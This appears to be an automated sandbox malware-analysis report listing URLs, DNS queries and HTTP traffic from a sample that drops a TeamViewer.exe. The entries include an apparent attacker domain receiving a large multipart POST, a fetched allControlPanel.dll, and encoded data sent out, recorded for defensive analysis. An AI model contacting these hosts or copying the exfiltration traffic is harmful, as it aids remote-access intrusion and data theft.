Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001s
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGateP
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate2
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateY
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.479621108.000001C49590B000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749228779.00000282E9C16000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://go.teamviewer.comn0
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001B
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001J
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001PIx
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001X
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001h
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001p
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001t
Source: TeamViewer.exe, 00000003.00000003.407522755.0000000005766000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001o
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412076158.0000000005766000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sT
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.415730284.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=19
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=3272978&client=DynGate&p=1000
Source: 77Etc0bR2v.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 77Etc0bR2v.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: TeamViewer.exe, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.TeamViewer.com/download
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.TeamViewer.com/help
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/6
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/8C631A8/
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/70
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/87096&p=10000001
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/s
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/B8C631A8/x
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp String found in binary or memory: https://outnegorave.info/allControlPanel.dll
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 87812 Content-Type: multipart/form-data; boundary=--------2771230636 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: outnegorave.info Connection: Close Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335540 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoA,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_6F335540
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1 Accept: */* Content-Type: application/octet-stream Content-Transfer-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
